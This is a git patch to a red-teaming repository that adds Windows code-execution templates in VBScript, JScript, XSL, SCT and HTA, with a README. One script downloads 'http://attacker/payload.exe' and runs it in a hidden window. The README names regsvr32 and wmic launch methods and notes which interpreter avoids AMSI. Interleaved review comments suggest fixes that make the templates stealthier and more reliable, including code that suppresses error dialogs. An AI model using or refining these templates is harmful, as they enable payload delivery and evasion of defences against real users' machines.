From 8e976e7ceefdeefbd6410b3fc7f56879b1453422 Mon Sep 17 00:00:00 2001 From: "Mariusz B. / mgeeky" Date: Wed, 6 May 2020 19:22:32 +0200 Subject: [PATCH] Added code-exec-templates --- red-teaming/README.md | 2 + red-teaming/code-exec-templates/README.md | 57 +++++++++++++++++++ .../download-file-and-exec.vbs | 38 +++++++++++++ .../hello-world-jscript-xslt.xsl | 15 +++++ .../code-exec-templates/wmi-exec-command.vbs | 20 +++++++ .../wscript-shell-code-exec.vbs | 13 +++++ .../wscript-shell-run-jscript-scriptlet.sct | 15 +++++ .../wscript-shell-run-jscript-xslt.xsl | 14 +++++ .../wscript-shell-run-vbscript.hta | 14 +++++ .../wscript-shell-stdin-code-exec.vbs | 19 +++++++ 10 files changed, 207 insertions(+) create mode 100644 red-teaming/code-exec-templates/README.md create mode 100644 red-teaming/code-exec-templates/download-file-and-exec.vbs create mode 100644 red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl create mode 100644 red-teaming/code-exec-templates/wmi-exec-command.vbs create mode 100644 red-teaming/code-exec-templates/wscript-shell-code-exec.vbs create mode 100644 red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct create mode 100644 red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl create mode 100644 red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta create mode 100644 red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs diff --git a/red-teaming/README.md b/red-teaming/README.md index 5f49556..4ae0bc6 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md 
@@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf - **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements. +- [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS) + - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc)) diff --git a/red-teaming/code-exec-templates/README.md b/red-teaming/code-exec-templates/README.md new file mode 100644 index 0000000..f27fd27 --- /dev/null +++ b/red-teaming/code-exec-templates/README.md 
@@ -0,0 +1,57 @@ +### A small collection of unobfuscated code-execution primitives in different languages + +A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. + +Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: + +- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** + +- `wscript.exe` - For general scripts execution. **This one loads AMSI** + + +#### VBScript + +- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` + +- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` + +- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. + +- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` + + +#### JScript + + +#### XSL + +XSL files can be executed in the following ways: + +- Using `wmic.exe`: +``` +wmic os get /format:"jscript-xslt-template.xsl" +``` + +Templates: + +- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. 
+ +- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method + + + +#### COM Scriptlets + +Sample code execution with `regsvr32` can be following: +``` +regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll +``` + +- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` + + +#### HTA + +HTA files are HTML Applications + +- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ \ No newline at end of file diff --git a/red-teaming/code-exec-templates/download-file-and-exec.vbs b/red-teaming/code-exec-templates/download-file-and-exec.vbs new file mode 100644 index 0000000..e20366f --- /dev/null +++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs @@ -0,0 +1,38 @@ +' +' Example of downloading a binary file from the URL, saving it to the +' local filesystem and then launching. +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +downloadURL = "http://attacker/payload.exe" +saveAs = "%TEMP%\foo.exe" +parameters = "" + +Dim sh: Set sh = CreateObject("WScript.Shell") +out = sh.ExpandEnvironmentStrings(saveAs) + +' STEP 1: Download File +Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP") +xhr.Open "GET", downloadURL, False +xhr.Send + +' STEP 2: Save binary file +If xhr.Status = 200 Then + With CreateObject("Adodb.Stream") + .Open + .Type = 1 + .write xhr.responseBody + .savetofile out, 2 + End With + + ' STEP 3: Execute file + cmd = out & " " & parameters + MsgBox cmd + sh.Run cmd, 0, False + +End If + +Set sh = Nothing +Set xhr = Nothing \ No newline at end of file diff --git a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl new file mode 100644 index 0000000..a483e85 --- /dev/null +++ b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl @@ -0,0 +1,15 @@ + + + + + + \ No newline at end of file 
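Review bot: The executable path is handed to `sh.Run` unquoted via `cmd = out & " " & parameters`, and `%TEMP%` normally resolves under the user profile, so a profile name containing a space (`C:\Users\John Doe\...`) breaks the launch; build it as `cmd = """" & out & """ " & parameters`. The `MsgBox cmd` on the line before the Run call reads like a leftover debug statement and contradicts the hidden-window intent of `sh.Run cmd, 0, False` — drop it or gate it behind a debug flag. There is no error handling either: `xhr.Send` raises a runtime error when the host cannot be reached and `.savetofile` raises when the path is unwritable, which under wscript.exe surfaces as a visible error dialog, so either say so in the header comment or use `On Error Resume Next` with an `Err.Number` check after `xhr.Send`. `Msxml2.ServerXMLHTTP` is also used without `setTimeouts`, so a stalled server blocks the script indefinitely.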
diff --git a/red-teaming/code-exec-templates/wmi-exec-command.vbs b/red-teaming/code-exec-templates/wmi-exec-command.vbs new file mode 100644 index 0000000..e917727 --- /dev/null +++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs @@ -0,0 +1,20 @@ +' +' This script uses WMI class' Win32_Process static method Create to +' execute given command in a hidden window (ShowWindow = 12). +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" +computer = "." + +Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ + & computer & "\root\cimv2") + +Set startup = wmi.Get("Win32_ProcessStartup") +Set conf = startup.SpawnInstance_ +conf.ShowWindow = 12 + +Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") +proc.Create command, Null, conf, intProcessID \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs new file mode 100644 index 0000000..f6c3d00 --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs @@ -0,0 +1,13 @@ +' +' This script uses classic WScript.Shell Run method to +' execute given command in a hidden window (second param = 0) +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" + +With CreateObject("WScript.Shell") + .Run command, 0, False +End With diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct new file mode 100644 index 0000000..afcdbfe --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct @@ -0,0 +1,15 @@ + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl new file mode 100644 index 0000000..04c017c --- /dev/null 
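Review bot: The `computer` variable is only honored for the `Win32_ProcessStartup` lookup; the process itself is created through a second `GetObject("winmgmts:root\cimv2:Win32_Process")` whose moniker carries no host, so `command` always runs locally no matter what `computer` is set to. Reuse the connected namespace instead, `Set proc = wmi.Get("Win32_Process")`, and capture the result, since `Create` returns a non-zero code on failure that the script currently discards: `ret = proc.Create(command, Null, conf, intProcessID)` followed by `If ret <> 0 Then WScript.Echo "Create failed: " & ret`. The header comment also asserts that `ShowWindow = 12` gives a hidden window, but the documented values for `Win32_ProcessStartup.ShowWindow` are the SW_* constants 0–11 with `SW_HIDE = 0`; if hiding is the intent, `conf.ShowWindow = 0` is the documented value, and at minimum the comment should say that 12 lies outside the documented range.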
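Review bot: The header comment explains the second `Run` argument but not the third: `False` means `Run` returns immediately (always 0, not an exit code) and the script finishes without knowing whether the child ran, while a missing or non-executable `command` raises a WSH runtime error instead of a status, which under wscript.exe shows up as a dialog despite the hidden-window setting. Suggested header addition: `' Third param = False: don't wait; Run returns 0 right away, and a missing executable raises a runtime error (visible dialog under wscript.exe)`. If the template is meant to be silent end to end, wrap the call in `On Error Resume Next` and check `Err.Number` afterwards.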
+++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl @@ -0,0 +1,14 @@ + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta new file mode 100644 index 0000000..e946d45 --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta @@ -0,0 +1,14 @@ + + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs new file mode 100644 index 0000000..c1bb438 --- /dev/null +++ b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs @@ -0,0 +1,19 @@ +' +' This script uses classic WScript.Shell Exec method to +' execute given command in a hidden window via StdIn passed to a dedicated +' launcher command (powershell.exe in this example). +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +command = "notepad.exe" +launcher = "powershell -nop -w hid -Command -" + +With CreateObject("WScript.Shell") + With .Exec(launcher) + .StdIn.WriteLine command + .StdIn.WriteBlankLines 1 + .Terminate + End With +End With
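Review bot: `.Terminate` is called right after the two StdIn writes, so the launcher may be killed before it has read and acted on the piped `command`; whether `notepad.exe` actually gets spawned is then a race rather than a guarantee. StdIn is also never closed, so `powershell -Command -` never sees EOF on its own and relies purely on the blank line to run the block. Close StdIn to signal end of input, give the launcher a bounded window to finish by polling `.Status` (0 means still running), and only fall back to `.Terminate` if it is still alive after that. The header comment should also state that the launcher is killed rather than waited for, since that changes what the template does for any command that takes longer than the spawn.

```vbscript
With CreateObject("WScript.Shell")
    With .Exec(launcher)
        .StdIn.WriteLine command
        .StdIn.WriteBlankLines 1
        ' Close StdIn so the launcher sees EOF instead of being killed mid-read
        .StdIn.Close
        ' Bounded wait for the launcher to consume the input (Status 0 = running)
        waited = 0
        Do While .Status = 0 And waited < 5000
            WScript.Sleep 100
            waited = waited + 100
        Loop
        ' Only tear it down if it is still alive after the grace period
        If .Status = 0 Then .Terminate
    End With
End With
```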